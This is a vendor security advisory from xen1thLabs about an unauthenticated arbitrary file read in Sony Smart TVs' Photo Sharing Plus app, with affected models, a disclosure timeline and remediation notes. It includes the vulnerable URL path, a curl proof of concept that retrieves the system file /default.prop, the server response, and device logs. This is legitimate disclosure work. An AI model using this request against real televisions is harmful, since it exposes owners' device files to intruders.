Sony Smart TV Photo Sharing Plus Arbitrary File Read Vulnerability

23 April 2019












6.5 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)


















Sony Smart TVs (non-exhausted list):

KDL-50W800C, KDL-50W805C, KDL-50W807C, KDL-50W809C, KDL-50W820C, KDL-55W800C, KDL-55W805C, KDL-65W850C, KDL-65W855C, KDL-65W857C, KDL-75W850C, KDL-75W855C, XBR-43X830C, XBR-49X800C, XBR-49X830C, XBR-49X835C, XBR-49X837C, XBR-49X839C, XBR-55X805C, XBR-55X807C, XBR-55X809C, XBR-55X810C, XBR-55X850C, XBR-55X855C, XBR-55X857C, XBR-65X800C, XBR-65X805C, XBR-65X807C, XBR-65X809C, XBR-65X810C, XBR-65X850C, XBR-65X855C, XBR-65X857C, XBR-75X850C, XBR-75X855C, XBR-55X900C, XBR-55X905C, XBR-55X907C, XBR-65X900C, XBR-65X905C, XBR-65X907C, XBR-65X930C, XBR-75X910C, XBR-75X940C, XBR-75X945C, XBR-43X800D, XBR-49X800D, XBR-49X835D, XBR-55X850D, XBR-55X855D, XBR-55X857D, XBR-65X850D, XBR-65X855D, XBR-65X857D, XBR-75X850D, XBR-75X855D, XBR-75X857D, XBR-85X850D, XBR-85X855D, XBR-85X857D, XBR-55X930D, XBR-65X930D, XBR-65X935D, XBR-65X937D, XBR-75X940D, XBR-100Z9D, XBR-49X700D, XBR-55X700D, XBR-65X750D, XBR-65Z9D, XBR-75Z9D, XBR-43X800E, XBR-49X800E, XBR-49X900E, XBR-55A1E, XBR-55X800E, XBR-55X806E, XBR-55X900E, XBR-55X930E, XBR-65A1E, XBR-65X850E, XBR-65X900E, XBR-65X930E, XBR-75X850E, XBR-75X900E, XBR-75X940E, XBR-77A1E







The “Photo Sharing Plus” application running inside the Smart TV functionality is to upload photos from a smartphone to the TV, in order to display on the television screen. When the application is launched, it allows the TV to be a Wi-Fi access point and displays the Wi-Fi password allowing to authenticate and share media content on the Sony Smart TV.

This vulnerability allows an attacker to read arbitrary files located on the file-system of the TV without authentication, including valuable files.












This vulnerability allows an attacker to retrieve internal files located inside the TV file system, without authentication.

By default, images used by the Photo Sharing Plus application are stored inside ‘/data/user/0/’. The application initiates an access point on the television and a HTTP daemon is listening to a TCP port on the newly created WLAN.

Furthermore, this daemon also listens on the LAN side of the television and it is possible to retrieve these images from the LAN an image using this URL:


Browsing to the web address http://[ip_tv]:10000/contentshare/image/ allows access to the root directory of the television running Android.




By exploiting this vulnerability, ‘/default.prop’ (containing Android properties) can be retrieved via




root@kali:~# curl -v



Connected to ( port 10000 (#0)

> GET /contentshare/image/default.prop HTTP/1.1

> Host:

> User-Agent: curl/7.58.0

> Accept: /

< HTTP/1.1 200 OK

< Connection: close

< Content-Length: 591

< Content-Type: application/octet-stream






ro.debuggable=0 ro.zygote=zygote32



dalvik.vm.dex2oat-Xms=64m dalvik.vm.dex2oat-Xmx=512m

ro.dalvik.vm.native.bridge=0 debug.atrace.tags.enableflags=0



# 2016年 11月 14日 月曜日 15:34:56 JST 1479105296 Sony/BRAVIA_ATV2_PA/BRAVIA_ATV2:6.0.1/MMB29V.S50/ user/release-keys persist.sys.usb.config= none


Closing connection 0 



Device logs confirm the ‘/default.prop’ file has been delivered over HTTP: 



01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Handle get Uri :/contentshare/image/default.prop

01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]getLocalFilePath() start, uri=/contentshare/image/default.prop

01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]loadType: /contentshare/image

01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]localResPath: /default.prop

01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]ext:.prop

01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Content Type :application/octet-stream

01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]fileSize:591

01-01 07:46:00.892 5539 18775 D PhotoShareApp: [18775][e]Write to response ... 591

07:46:00.892 5539 18775 D PhotoShareApp: [18775][e]Write to response completed




























03/10/2018 – Vulnerabilities found

10/10/2018 - Report to Sony Bug bounty program through HackerOne

12/10/2018 - Confirmation of the reception of the bug report

15/10/2018 – xen1thLabs explains that the vulnerabilities are also exploitable over HbbTV (DVB-{S,T,C})

29/10/2018 - Sony confirms the vulnerabilities

09/11/2018 - Sony confirms the patches will be available in March 2019 and asks xen1thLabs to wait until April 2019

29/11/2018 – xen1thLabs sent the slides prior to xen1thLabs talk at HiTB Dubai 2018 as agreed with Sony

14/01/2019 - Updates requested from xen1thLabs

15/01/2019 - Sony informs xen1thlabs that they are working on patches

27/01/2019 - Updates requested from xen1thLabs

07/03/2019 - Updates requested from xen1thLabs

15/03/2019 – Sony informs xen1thLabs that the agreed date for disclosure is not possible because they don’t know when they will be ready “maybe in a couple of months”

17/03/2019 – Updates requested from Sony to understand and to publish a security advisory. xen1thLabs also requests a CVE officially

20/03/2019 – xen1thLabs asks for an acceptable timeline

21/03/2019 – xen1thLabs sent an email to due to the lack of proper communication from Sony and informing Sony that in order to protect their customers xen1thLabs needs to publish a security advisory  

21/03/2019 – Automatic response from is no more in use

22/03/2019 – Sony is working on the patches and confirms the 12th April

26/03/2019 – xen1thLabs confirms the release date of the advisory and asks for a CVE

01/04/2019 – Sony confirms the vulnerabilities affect a range of models and “Sony plans to terminate Photo Sharing Plus service for all of the models, and that completion date is scheduled for April 12th, 2019.”

23/04/2019 – Public disclosure












Apply patches provided by Sony 

Firmware update to v6.5830 from 01-22-2019 (including security patches?)


Firmware update to v6.5830 from 01-22-2019 (not including security patches)


End of Photo Sharing Plus 11/22/2018




xen1thLabs - Telecom Lab